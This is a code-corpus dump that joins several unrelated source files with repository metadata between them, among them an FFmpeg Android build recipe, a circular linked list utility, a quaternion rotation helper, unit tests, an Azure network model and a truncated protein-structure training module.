def stop(self):
pass
def reset(self):
pass
# Make both ABC happy and ensure 'self' is correct
FakeWorker.start = self._fake_start
FakeWorker.reset = self._fake_reset
workers = [FakeWorker()]
self.plugin.return_value.get_workers.return_value = workers
self._test_restart_service_on_sighup(service=self._start_plugin,
workers=len(workers))
| 34.485623
| 79
| 0.623217
|
4a04f4844f9f0c3bee1dcdadd24f325ceeb6aebf
| 4,997
|
py
|
Python
|
pythonforandroid/recipes/ffmpeg/__init__.py
|
Iqoqo/python-for-android
|
9361b9602923ab170b7aeb4e21bf5ec61f8823f2
|
[
"MIT"
] | 2
|
2021-02-05T10:13:05.000Z
|
2021-11-12T07:31:57.000Z
|
pythonforandroid/recipes/ffmpeg/__init__.py
|
Iqoqo/python-for-android
|
9361b9602923ab170b7aeb4e21bf5ec61f8823f2
|
[
"MIT"
] | 6
|
2020-01-31T18:04:48.000Z
|
2021-06-05T10:53:55.000Z
|
pythonforandroid/recipes/ffmpeg/__init__.py
|
Iqoqo/python-for-android
|
9361b9602923ab170b7aeb4e21bf5ec61f8823f2
|
[
"MIT"
] | 1
|
2021-04-08T19:51:07.000Z
|
2021-04-08T19:51:07.000Z
|
from pythonforandroid.toolchain import Recipe, current_directory, shprint
from os.path import exists, join, realpath
import sh
class FFMpegRecipe(Recipe):
version = 'n3.4.5'
# Moved to github.com instead of ffmpeg.org to improve download speed
url = 'https://github.com/FFmpeg/FFmpeg/archive/{version}.zip'
depends = ['sdl2'] # Need this to build correct recipe order
opts_depends = ['openssl', 'ffpyplayer_codecs']
patches = ['patches/configure.patch']
def should_build(self, arch):
build_dir = self.get_build_dir(arch.arch)
return not exists(join(build_dir, 'lib', 'libavcodec.so'))
def prebuild_arch(self, arch):
self.apply_patches(arch)
def get_recipe_env(self, arch):
env = super(FFMpegRecipe, self).get_recipe_env(arch)
env['NDK'] = self.ctx.ndk_dir
return env
def build_arch(self, arch):
with current_directory(self.get_build_dir(arch.arch)):
env = arch.get_env()
flags = ['--disable-everything']
cflags = []
ldflags = []
if 'openssl' in self.ctx.recipe_build_order:
flags += [
'--enable-openssl',
'--enable-nonfree',
'--enable-protocol=https,tls_openssl',
]
build_dir = Recipe.get_recipe('openssl', self.ctx).get_build_dir(arch.arch)
cflags += ['-I' + build_dir + '/include/']
ldflags += ['-L' + build_dir]
if 'ffpyplayer_codecs' in self.ctx.recipe_build_order:
# libx264
flags += ['--enable-libx264']
build_dir = Recipe.get_recipe('libx264', self.ctx).get_build_dir(arch.arch)
cflags += ['-I' + build_dir + '/include/']
ldflags += ['-lx264', '-L' + build_dir + '/lib/']
# libshine
flags += ['--enable-libshine']
build_dir = Recipe.get_recipe('libshine', self.ctx).get_build_dir(arch.arch)
cflags += ['-I' + build_dir + '/include/']
ldflags += ['-lshine', '-L' + build_dir + '/lib/']
# Enable all codecs:
flags += [
'--enable-parsers',
'--enable-decoders',
'--enable-encoders',
'--enable-muxers',
'--enable-demuxers',
]
else:
# Enable codecs only for .mp4:
flags += [
'--enable-parser=aac,ac3,h261,h264,mpegaudio,mpeg4video,mpegvideo,vc1',
'--enable-decoder=aac,h264,mpeg4,mpegvideo',
'--enable-muxer=h264,mov,mp4,mpeg2video',
'--enable-demuxer=aac,h264,m4v,mov,mpegvideo,vc1',
]
# needed to prevent _ffmpeg.so: version node not found for symbol av_init_packet@LIBAVFORMAT_52
# /usr/bin/ld: failed to set dynamic section sizes: Bad value
flags += [
'--disable-symver',
]
# disable binaries / doc
flags += [
'--disable-ffmpeg',
'--disable-ffplay',
'--disable-ffprobe',
'--disable-ffserver',
'--disable-doc',
]
# other flags:
flags += [
'--enable-filter=aresample,resample,crop,adelay,volume,scale',
'--enable-protocol=file,http',
'--enable-small',
'--enable-hwaccels',
'--enable-gpl',
'--enable-pic',
'--disable-static',
'--enable-shared',
]
if 'arm64' in arch.arch:
cross_prefix = 'aarch64-linux-android-'
arch_flag = 'aarch64'
else:
cross_prefix = 'arm-linux-androideabi-'
arch_flag = 'arm'
# android:
flags += [
'--target-os=android',
'--cross-prefix={}'.format(cross_prefix),
'--arch={}'.format(arch_flag),
'--sysroot=' + self.ctx.ndk_platform,
'--enable-neon',
'--prefix={}'.format(realpath('.')),
]
if arch_flag == 'arm':
cflags += [
'-mfpu=vfpv3-d16',
'-mfloat-abi=softfp',
'-fPIC',
]
env['CFLAGS'] += ' ' + ' '.join(cflags)
env['LDFLAGS'] += ' ' + ' '.join(ldflags)
configure = sh.Command('./configure')
shprint(configure, *flags, _env=env)
shprint(sh.make, '-j4', _env=env)
shprint(sh.make, 'install', _env=env)
# copy libs:
sh.cp('-a', sh.glob('./lib/lib*.so'),
self.ctx.get_libs_dir(arch.arch))
recipe = FFMpegRecipe()
| 36.210145
| 107
| 0.479288
|
4a04f4fb3064cde5b5b6a0e13512bd8d57ff3876
| 8,272
|
py
|
Python
|
ryu/services/protocols/bgp/utils/circlist.py
|
w180112/ryu
|
aadb6609f585c287b4928db9462baf72c6410718
|
[
"Apache-2.0"
] | 975
|
2015-01-03T02:30:13.000Z
|
2020-05-07T14:01:48.000Z
|
ryu/services/protocols/bgp/utils/circlist.py
|
DiegoRossiMafioletti/ryu
|
6f906e72c92e10bd0264c9b91a2f7bb85b97780c
|
[
"Apache-2.0"
] | 66
|
2020-05-22T21:55:42.000Z
|
2022-03-31T12:35:04.000Z
|
ryu/services/protocols/bgp/utils/circlist.py
|
DiegoRossiMafioletti/ryu
|
6f906e72c92e10bd0264c9b91a2f7bb85b97780c
|
[
"Apache-2.0"
] | 763
|
2015-01-01T03:38:43.000Z
|
2020-05-06T15:46:09.000Z
|
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
if six.PY3:
from sys import intern
class CircularListType(object):
"""Instances of this class represent a specific type of list.
Nodes are linked in a circular fashion, using attributes on the
nodes themselves.
Example:
ItemList = CircularListType(next_attr='_next',
prev_attr='_prev')
l = ItemList()
l.prepend(item)
The created list has the following properties:
- A node can be inserted O(1) time at the head, tail, or
after/before another specified node.
- A node can be removed in O(1) time from any list it may be on,
without providing a reference to the list.
- The current node in an iteration can be deleted safely.
"""
class List(object):
"""An object that represents a list.
This class is not expected to be used directly by clients. Rather, they
would use the 'create' method of a CircularListType object to create an
instance.
"""
# Define the set of valid attributes so as to make the list
# head lightweight.
#
# We override __getattr__ and __setattr__ so as to store the
# the next and previous references on the list head in
# _next_slot_ and _prev_slot_ respectively.
__slots__ = ["list_type", "head", "_next_slot_",
"_prev_slot_"]
def __init__(self, list_type):
self.list_type = list_type
# Save memory by using the List object itself as the head.
self.head = self
self.list_type.node_init(self.head)
def __getattr__(self, name):
if(name == self.list_type.next_name):
return self._next_slot_
if(name == self.list_type.prev_name):
return self._prev_slot_
raise AttributeError(name)
def __setattr__(self, name, value):
if(name in CircularListType.List.__slots__):
object.__setattr__(self, name, value)
return
if(name == self.list_type.next_name):
self._next_slot_ = value
return
if(name == self.list_type.prev_name):
self._prev_slot_ = value
return
raise AttributeError(name)
def is_empty(self):
return not self.list_type.node_is_on_list(self.head)
def clear(self):
"""Remove all items from the list."""
# Make sure that all items are unlinked.
for node in self:
self.remove(node)
def is_on_list(self, node):
return self.list_type.node_is_on_list(node)
def append(self, node):
self.list_type.node_insert_before(self.head, node)
def prepend(self, node):
self.list_type.node_insert_after(self.head, node)
def __iter__(self):
return self.generator()
def remove(self, node):
"""List the given node from the list.
Note that this does not verify that the node is on this
list. It could even be on a different list.
"""
self.list_type.node_unlink(node)
self.list_type.node_del_attrs(node)
def pop_first(self):
"""Remove the first item in the list and return it."""
node = self.list_type.node_next(self.head)
if(node is self.head):
return None
self.remove(node)
return node
def generator(self):
"""Enables iteration over the list.
The current item can safely be removed from the list during
iteration.
"""
# Keep a pointer to the next node when returning the
# current node. This allows the caller to remove the
# current node safely.
node = self.list_type.node_next(self.head)
next = self.list_type.node_next(node)
while(node is not self.head):
yield node
node = next
next = self.list_type.node_next(node)
#
# CircularListType methods
#
def __init__(self, next_attr_name=None, prev_attr_name=None):
"""Initializes this list.
next_attr_name: The name of the attribute that holds a reference
to the next item in the list.
prev_attr_name: the name of the attribute that holds a reference
to the previous item in the list.
"""
# Keep an interned version of the attribute names. This should
# speed up the process of looking up the attributes.
self.next_name = intern(next_attr_name)
self.prev_name = intern(prev_attr_name)
def create(self):
return CircularListType.List(self)
def __call__(self):
"""Make a CircularListType instance look like a class by
creating a list object.
"""
return self.create()
def node_init(self, node):
assert(not self.node_is_on_list(node))
# Set the node to point to itself as the previous and next
# entries.
self.node_set_next(node, node)
self.node_set_prev(node, node)
def node_next(self, node):
try:
return getattr(node, self.next_name)
except AttributeError:
return None
def node_set_next(self, node, next):
setattr(node, self.next_name, next)
def node_prev(self, node):
try:
return getattr(node, self.prev_name)
except AttributeError:
return None
def node_set_prev(self, node, prev):
setattr(node, self.prev_name, prev)
def node_del_attrs(self, node):
"""Remove all attributes that are used for putting this node
on this type of list.
"""
try:
delattr(node, self.next_name)
delattr(node, self.prev_name)
except AttributeError:
pass
def node_is_on_list(self, node):
"""Returns True if this node is on *some* list.
A node is not on any list if it is linked to itself, or if it
does not have the next and/prev attributes at all.
"""
next = self.node_next(node)
if next == node or next is None:
assert(self.node_prev(node) is next)
return False
return True
def node_insert_after(self, node, new_node):
"""Insert the new node after node."""
assert(not self.node_is_on_list(new_node))
assert(node is not new_node)
next = self.node_next(node)
assert(next is not None)
self.node_set_next(node, new_node)
self.node_set_prev(new_node, node)
self.node_set_next(new_node, next)
self.node_set_prev(next, new_node)
def node_insert_before(self, node, new_node):
"""Insert the new node before node."""
assert(not self.node_is_on_list(new_node))
assert(node is not new_node)
prev = self.node_prev(node)
assert(prev is not None)
self.node_set_prev(node, new_node)
self.node_set_next(new_node, node)
self.node_set_prev(new_node, prev)
self.node_set_next(prev, new_node)
def node_unlink(self, node):
if not self.node_is_on_list(node):
return
prev = self.node_prev(node)
next = self.node_next(node)
self.node_set_next(prev, next)
self.node_set_prev(next, prev)
self.node_set_next(node, node)
self.node_set_prev(node, node)
| 30.637037
| 79
| 0.606141
|
4a04f65010da00ac99ce4e94458c045dadd7b2fe
| 67
|
py
|
Python
|
wave_reader/__init__.py
|
ztroop/wave-reader-utils
|
21b8fe941888e7ce5c4e3e04e87ee8cc9c2f0cbb
|
[
"MIT"
] | 11
|
2021-02-10T04:32:07.000Z
|
2021-12-29T04:17:06.000Z
|
wave_reader/__init__.py
|
ztroop/wave-reader
|
21b8fe941888e7ce5c4e3e04e87ee8cc9c2f0cbb
|
[
"MIT"
] | 12
|
2021-01-23T06:45:19.000Z
|
2021-12-29T04:20:53.000Z
|
wave_reader/__init__.py
|
ztroop/wave-reader
|
21b8fe941888e7ce5c4e3e04e87ee8cc9c2f0cbb
|
[
"MIT"
] | 5
|
2021-02-12T09:15:20.000Z
|
2021-09-13T05:05:40.000Z
|
from .wave import WaveDevice, discover_devices, scan # noqa: F401
| 33.5
| 66
| 0.776119
|
4a04f6ec396aba28080116ad7234bf4b4915ac5d
| 882
|
py
|
Python
|
tests/app/public_contracts/__init__.py
|
davidbgk/notification-api
|
0ede6a61b48289236d1873124965d2bc22a9b27b
|
[
"MIT"
] | null | null | null |
tests/app/public_contracts/__init__.py
|
davidbgk/notification-api
|
0ede6a61b48289236d1873124965d2bc22a9b27b
|
[
"MIT"
] | null | null | null |
tests/app/public_contracts/__init__.py
|
davidbgk/notification-api
|
0ede6a61b48289236d1873124965d2bc22a9b27b
|
[
"MIT"
] | null | null | null |
import os
from urllib.parse import urljoin
from urllib.request import pathname2url
from flask import json
import jsonschema
from jsonschema import Draft4Validator
def return_json_from_response(response):
return json.loads(response.get_data(as_text=True))
def validate_v0(json_to_validate, schema_filename):
schema_dir = os.path.join(os.path.dirname(__file__), 'schemas', 'v0')
uri = urljoin('file:', pathname2url(schema_dir) + "/")
resolver = jsonschema.RefResolver(uri, None)
with open(os.path.join(schema_dir, schema_filename)) as schema:
jsonschema.validate(
json_to_validate,
json.load(schema),
format_checker=jsonschema.FormatChecker(),
resolver=resolver
)
def validate(json_to_validate, schema):
validator = Draft4Validator(schema)
validator.validate(json_to_validate, schema)
| 29.4
| 73
| 0.725624
|
4a04f79d7db5eab098b0e7198581895dc07a8683
| 8,182
|
py
|
Python
|
simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/deepracer_simulation/scripts/rotation.py
|
Lacan82/deepracer
|
4503480cf80993f1e94cec8d26d783d6b2121cd8
|
[
"Apache-2.0"
] | 16
|
2019-12-24T06:46:31.000Z
|
2022-03-31T00:13:39.000Z
|
simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/deepracer_simulation/scripts/rotation.py
|
Lacan82/deepracer
|
4503480cf80993f1e94cec8d26d783d6b2121cd8
|
[
"Apache-2.0"
] | null | null | null |
simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/deepracer_simulation/scripts/rotation.py
|
Lacan82/deepracer
|
4503480cf80993f1e94cec8d26d783d6b2121cd8
|
[
"Apache-2.0"
] | 5
|
2020-02-11T22:13:07.000Z
|
2020-12-15T16:46:15.000Z
|
#!/usr/bin/env python
"""This code is taken from
https://github.com/scipy/scipy/blob/master/scipy/spatial/transform/rotation.py
because there is no python 3 implementation This is a stripped down version
intended to be used by deepracer only.
"""
import re
import numpy as np
import scipy.linalg
_AXIS_TO_IND = {'x': 0, 'y': 1, 'z': 2}
def _compose_quat(p, q):
product = np.empty((max(p.shape[0], q.shape[0]), 4))
product[:, 3] = p[:, 3] * q[:, 3] - np.sum(p[:, :3] * q[:, :3], axis=1)
product[:, :3] = (p[:, None, 3] * q[:, :3] + q[:, None, 3] * p[:, :3] +
np.cross(p[:, :3], q[:, :3]))
return product
def _make_elementary_quat(axis, angles):
quat = np.zeros((angles.shape[0], 4))
quat[:, 3] = np.cos(angles / 2)
quat[:, _AXIS_TO_IND[axis]] = np.sin(angles / 2)
return quat
def _elementary_quat_compose(seq, angles, intrinsic=False):
result = _make_elementary_quat(seq[0], angles[:, 0])
for idx, axis in enumerate(seq[1:], start=1):
if intrinsic:
result = _compose_quat(
result,
_make_elementary_quat(axis, angles[:, idx]))
else:
result = _compose_quat(
_make_elementary_quat(axis, angles[:, idx]),
result)
return result
class Rotation(object):
def __init__(self, quat, normalized=False, copy=True):
self._single = False
quat = np.asarray(quat, dtype=float)
if quat.ndim not in [1, 2] or quat.shape[-1] != 4:
raise ValueError("Expected `quat` to have shape (4,) or (N x 4), "
"got {}.".format(quat.shape))
# If a single quaternion is given, convert it to a 2D 1 x 4 matrix but
# set self._single to True so that we can return appropriate objects
# in the `to_...` methods
if quat.shape == (4,):
quat = quat[None, :]
self._single = True
if normalized:
self._quat = quat.copy() if copy else quat
else:
self._quat = quat.copy()
norms = scipy.linalg.norm(quat, axis=1)
zero_norms = norms == 0
if zero_norms.any():
raise ValueError("Found zero norm quaternions in `quat`.")
# Ensure norm is broadcasted along each column.
self._quat[~zero_norms] /= norms[~zero_norms][:, None]
def __len__(self):
"""Number of rotations contained in this object.
Multiple rotations can be stored in a single instance.
Returns
-------
length : int
Number of rotations stored in object.
"""
return self._quat.shape[0]
@classmethod
def from_euler(cls, seq, angles, degrees=False):
"""Initialize from Euler angles.
Rotations in 3 dimensions can be represented by a sequece of 3
rotations around a sequence of axes. In theory, any three axes spanning
the 3D Euclidean space are enough. In practice the axes of rotation are
chosen to be the basis vectors.
The three rotations can either be in a global frame of reference
(extrinsic) or in a body centred frame of refernce (intrinsic), which
is attached to, and moves with, the object under rotation [1]_.
Parameters
----------
seq : string
Specifies sequence of axes for rotations. Up to 3 characters
belonging to the set {'X', 'Y', 'Z'} for intrinsic rotations, or
{'x', 'y', 'z'} for extrinsic rotations. Extrinsic and intrinsic
rotations cannot be mixed in one function call.
angles : float or array_like, shape (N,) or (N, [1 or 2 or 3])
Euler angles specified in radians (`degrees` is False) or degrees
(`degrees` is True).
For a single character `seq`, `angles` can be:
- a single value
- array_like with shape (N,), where each `angle[i]`
corresponds to a single rotation
- array_like with shape (N, 1), where each `angle[i, 0]`
corresponds to a single rotation
For 2- and 3-character wide `seq`, `angles` can be:
- array_like with shape (W,) where `W` is the width of
`seq`, which corresponds to a single rotation with `W` axes
- array_like with shape (N, W) where each `angle[i]`
corresponds to a sequence of Euler angles describing a single
rotation
degrees : bool, optional
If True, then the given angles are assumed to be in degrees.
Default is False.
Returns
-------
rotation : `Rotation` instance
Object containing the rotation represented by the sequence of
rotations around given axes with given angles.
"""
num_axes = len(seq)
if num_axes < 1 or num_axes > 3:
raise ValueError("Expected axis specification to be a non-empty "
"string of upto 3 characters, got {}".format(seq))
intrinsic = (re.match(r'^[XYZ]{1,3}$', seq) is not None)
extrinsic = (re.match(r'^[xyz]{1,3}$', seq) is not None)
if not (intrinsic or extrinsic):
raise ValueError("Expected axes from `seq` to be from ['x', 'y', "
"'z'] or ['X', 'Y', 'Z'], got {}".format(seq))
if any(seq[i] == seq[i+1] for i in range(num_axes - 1)):
raise ValueError("Expected consecutive axes to be different, "
"got {}".format(seq))
seq = seq.lower()
angles = np.asarray(angles, dtype=float)
if degrees:
angles = np.deg2rad(angles)
is_single = False
# Prepare angles to have shape (num_rot, num_axes)
if num_axes == 1:
if angles.ndim == 0:
# (1, 1)
angles = angles.reshape((1, 1))
is_single = True
elif angles.ndim == 1:
# (N, 1)
angles = angles[:, None]
elif angles.ndim == 2 and angles.shape[-1] != 1:
raise ValueError("Expected `angles` parameter to have shape "
"(N, 1), got {}.".format(angles.shape))
elif angles.ndim > 2:
raise ValueError("Expected float, 1D array, or 2D array for "
"parameter `angles` corresponding to `seq`, "
"got shape {}.".format(angles.shape))
else: # 2 or 3 axes
if angles.ndim not in [1, 2] or angles.shape[-1] != num_axes:
raise ValueError("Expected `angles` to be at most "
"2-dimensional with width equal to number "
"of axes specified, got {} for shape".format(angles.shape))
if angles.ndim == 1:
# (1, num_axes)
angles = angles[None, :]
is_single = True
# By now angles should have shape (num_rot, num_axes)
# sanity check
if angles.ndim != 2 or angles.shape[-1] != num_axes:
raise ValueError("Expected angles to have shape (num_rotations, "
"num_axes), got {}.".format(angles.shape))
quat = _elementary_quat_compose(seq, angles, intrinsic)
return cls(quat[0] if is_single else quat, normalized=True, copy=False)
def as_quat(self):
""" Represent as quaternions.
Rotations in 3 dimensions can be represented using unit norm
quaternions [1]_. The mapping from quaternions to rotations is
two-to-one, i.e. quaternions ``q`` and ``-q``, where ``-q`` simply
reverses the sign of each component, represent the same spatial
rotation.
Returns
-------
quat : `numpy.ndarray`, shape (4,) or (N, 4)
Shape depends on shape of inputs used for initialization.
"""
if self._single:
return self._quat[0].copy()
else:
return self._quat.copy
| 41.744898
| 92
| 0.551577
|
4a04f7fb55def05222c21af8e257039e75e96ed6
| 5,388
|
py
|
Python
|
canvas_workflow_helpers/tests/test_appointment_task_creator.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 12
|
2022-02-25T18:15:43.000Z
|
2022-03-30T18:43:02.000Z
|
canvas_workflow_helpers/tests/test_appointment_task_creator.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 1
|
2022-03-18T22:21:03.000Z
|
2022-03-18T22:22:36.000Z
|
canvas_workflow_helpers/tests/test_appointment_task_creator.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 4
|
2022-02-25T18:15:33.000Z
|
2022-02-25T19:14:17.000Z
|
from pathlib import Path
from canvas_workflow_kit.constants import CHANGE_TYPE
from canvas_workflow_kit.utils import parse_class_from_python_source
from .base import WorkflowHelpersBaseTest
from canvas_workflow_kit import events
from canvas_workflow_kit.protocol import (ProtocolResult,
STATUS_NOT_APPLICABLE)
class AppointmentTaskCreatorTest(WorkflowHelpersBaseTest):
def setUp(self):
super().setUp()
currentDir = Path(__file__).parent.resolve()
self.mocks_path = f'{currentDir}/mock_data/'
patient_has_appointments = self.load_patient(
'patient_appointments/patient_has_appointments')
patient_no_appointments = self.load_patient(
'patient_appointments/patient_no_appointments')
self.appointment_class = self.createProtocolClass()(
patient=patient_has_appointments)
self.no_appointment_class = self.createProtocolClass()(
patient=patient_no_appointments)
def createProtocolClass(self):
template_path = Path(
__file__).parent.parent / 'protocols/appointment_task_creator.py'
template = template_path.open('r').read()
return parse_class_from_python_source(template)
def test_fields(self):
Protocol = self.appointment_class
self.assertEqual(
'Listens for appointment creates and generates a task.',
Protocol._meta.description)
self.assertEqual('Appointment Task Creator', Protocol._meta.title)
self.assertEqual('v1.0.0', Protocol._meta.version)
self.assertEqual('https://canvasmedical.com/',
Protocol._meta.information)
self.assertEqual(['AppointmentTaskCreator'],
Protocol._meta.identifiers)
self.assertEqual(['Task'], Protocol._meta.types)
self.assertEqual([events.HEALTH_MAINTENANCE],
Protocol._meta.responds_to_event_types)
self.assertEqual([CHANGE_TYPE.APPOINTMENT],
Protocol._meta.compute_on_change_types)
self.assertEqual(['Canvas Medical'], Protocol._meta.authors)
self.assertEqual(['Canvas Medical'], Protocol._meta.references)
self.assertEqual('', Protocol._meta.funding_source)
def test_appointment_class_result(self):
tested = self.appointment_class
result = tested.compute_results()
self.assertIsInstance(result, ProtocolResult)
self.assertEqual(STATUS_NOT_APPLICABLE, result.status)
self.assertEqual([], result.recommendations)
self.assertEqual('', result.narrative)
self.assertIsNone(result.due_in)
self.assertEqual(30, result.days_of_notice)
self.assertIsNone(result.next_review)
def test_no_appointment_class_result(self):
tested = self.no_appointment_class
result = tested.compute_results()
self.assertIsInstance(result, ProtocolResult)
self.assertEqual(STATUS_NOT_APPLICABLE, result.status)
self.assertEqual([], result.recommendations)
self.assertEqual('', result.narrative)
self.assertIsNone(result.due_in)
self.assertEqual(30, result.days_of_notice)
self.assertIsNone(result.next_review)
def test_get_record_by_id(self):
tested_no_appointments = self.no_appointment_class
test_appointments = self.appointment_class
empty_given_none = tested_no_appointments.get_record_by_id(None, None)
no_error_given_id = tested_no_appointments.get_record_by_id(
tested_no_appointments.patient.upcoming_appointment_notes, 11)
not_empty_given_appointment = test_appointments.get_record_by_id(
test_appointments.patient.upcoming_appointment_notes, 6)
self.assertEqual({}, empty_given_none)
self.assertEqual({}, no_error_given_id)
self.assertEqual(
not_empty_given_appointment, {
"id":
6,
"isLocked":
False,
"stateHistory": [{
"id": 11,
"state": "SCH"
}, {
"id": 12,
"state": "BKD"
}],
"providerDisplay": {
"firstName": "Sam",
"lastName": "Tregar",
"key": "bb24f084e1fa46c7931663259540266d"
},
"location": {
"id": 1,
"fullName": "Canvas Clinic San Francisco"
},
"appointments": [5],
"currentAppointmentId":
5
})
def test_get_new_field_value(self):
tested_no_appointments = self.no_appointment_class
none_given_none = tested_no_appointments.get_new_field_value(None)
self.assertIsNone(none_given_none)
def test_is_appointment_and_created(self):
tested_no_appointments = self.no_appointment_class
no_appointments = tested_no_appointments.is_appointment_and_created()
self.assertEqual(False, no_appointments)
def test_find_provider_key(self):
tested_no_appointments = self.no_appointment_class
no_expected_provider = tested_no_appointments.find_provider_key()
self.assertIsNone(no_expected_provider)
| 40.208955
| 78
| 0.649963
|
4a04f7fd025984c30bd5191bf411ec6afd01e616
| 1,603
|
py
|
Python
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/troubleshooting_result_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/troubleshooting_result_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/troubleshooting_result_py3.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TroubleshootingResult(Model):
"""Troubleshooting information gained from specified resource.
:param start_time: The start time of the troubleshooting.
:type start_time: datetime
:param end_time: The end time of the troubleshooting.
:type end_time: datetime
:param code: The result code of the troubleshooting.
:type code: str
:param results: Information from troubleshooting.
:type results:
list[~azure.mgmt.network.v2018_01_01.models.TroubleshootingDetails]
"""
_attribute_map = {
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'code': {'key': 'code', 'type': 'str'},
'results': {'key': 'results', 'type': '[TroubleshootingDetails]'},
}
def __init__(self, *, start_time=None, end_time=None, code: str=None, results=None, **kwargs) -> None:
super(TroubleshootingResult, self).__init__(**kwargs)
self.start_time = start_time
self.end_time = end_time
self.code = code
self.results = results
| 38.166667
| 106
| 0.616968
|
4a04f81a79214195858f0482c5a90c62f0fc1253
| 9,966
|
py
|
Python
|
examples/train_lightning.py
|
blazingsiyan/geometric-vector-perceptron
|
eee1ee8e71148cfdb3e02b660d80f12cf1cecd0a
|
[
"MIT"
] | null | null | null |
examples/train_lightning.py
|
blazingsiyan/geometric-vector-perceptron
|
eee1ee8e71148cfdb3e02b660d80f12cf1cecd0a
|
[
"MIT"
] | null | null | null |
examples/train_lightning.py
|
blazingsiyan/geometric-vector-perceptron
|
eee1ee8e71148cfdb3e02b660d80f12cf1cecd0a
|
[
"MIT"
] | null | null | null |
import gc
from argparse import ArgumentParser
from functools import partial
from pathlib import Path
from pprint import pprint
import matplotlib.pyplot as plt
import numpy as np
import pytorch_lightning as pl
import torch
from einops import rearrange
from loguru import logger
from pytorch_lightning.callbacks import (
GPUStatsMonitor,
LearningRateMonitor,
ModelCheckpoint,
ProgressBar,
)
from pytorch_lightning.loggers import TensorBoardLogger
from examples.data_handler import kabsch_torch, scn_cloud_mask
from examples.data_utils import (
encode_whole_bonds,
encode_whole_protein,
from_encode_to_pred,
prot_covalent_bond,
)
from examples.scn_data_module import ScnDataModule
from geometric_vector_perceptron.geometric_vector_perceptron import GVP_Network
class StructureModel(pl.LightningModule):
@staticmethod
def add_model_specific_args(parent_parser):
# model
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser.add_argument("--depth", type=int, default=4)
parser.add_argument("--cutoffs", type=float, default=1.0)
parser.add_argument("--noise", type=float, default=1.0)
# optimizer & scheduler
parser.add_argument("--init_lr", type=float, default=1e-3)
return parser
def __init__(
self,
depth: int = 1,
cutoffs: float = 1.0,
noise: float = 1.0,
init_lr: float = 1e-3,
**kwargs,
):
super().__init__()
self.save_hyperparameters()
self.model = GVP_Network(
n_layers=depth,
feats_x_in=48,
vectors_x_in=7,
feats_x_out=48,
vectors_x_out=7,
feats_edge_in=4,
vectors_edge_in=1,
feats_edge_out=4,
vectors_edge_out=1,
embedding_nums=[36, 20],
embedding_dims=[16, 16],
edge_embedding_nums=[2],
edge_embedding_dims=[2],
residual=True,
)
self.needed_info = {
"cutoffs": [cutoffs],
"bond_scales": [1],
"aa_pos_scales": [1, 2, 4, 8, 16, 32, 64, 128],
"atom_pos_scales": [1, 2, 4, 8, 16, 32],
"dist2ca_norm_scales": [1, 2, 4],
"bb_norms_atoms": [0.5], # will encode 3 vectors with this
}
self.noise = noise
self.init_lr = init_lr
self.baseline_losses = []
self.epoch_losses = []
def forward(self, seq, true_coords, angles, padding_seq, mask):
needed_info = self.needed_info
device = true_coords.device
needed_info["seq"] = seq[: (-padding_seq) or None]
needed_info["covalent_bond"] = prot_covalent_bond(needed_info["seq"])
pre_target = encode_whole_protein(
seq,
true_coords,
angles,
padding_seq,
needed_info=needed_info,
free_mem=True,
)
pre_target_x, _, _, embedd_info = pre_target
encoded = encode_whole_protein(
seq,
true_coords + self.noise * torch.randn_like(true_coords),
angles,
padding_seq,
needed_info=needed_info,
free_mem=True,
)
x, edge_index, edge_attrs, embedd_info = encoded
batch = torch.tensor([0 for i in range(x.shape[0])], device=x.device).long()
# add position coords
cloud_mask = scn_cloud_mask(seq[: (-padding_seq) or None]).to(device)
# cloud is all points, chain is all for which we have labels
chain_mask = mask[: (-padding_seq) or None].unsqueeze(-1) * cloud_mask
flat_chain_mask = rearrange(chain_mask.bool(), "l c -> (l c)")
cloud_mask = cloud_mask.bool()
flat_cloud_mask = rearrange(cloud_mask, "l c -> (l c)")
recalc_edge = partial(
encode_whole_bonds,
x_format="encode",
embedd_info=embedd_info,
needed_info=needed_info,
free_mem=True,
)
# predict
scores = self.model.forward(
x,
edge_index,
batch=batch,
edge_attr=edge_attrs,
recalc_edge=recalc_edge,
verbose=False,
)
# format pred, baseline and target
target = from_encode_to_pred(
pre_target_x, embedd_info=embedd_info, needed_info=needed_info
)
pred = from_encode_to_pred(
scores, embedd_info=embedd_info, needed_info=needed_info
)
base = from_encode_to_pred(x, embedd_info=embedd_info, needed_info=needed_info)
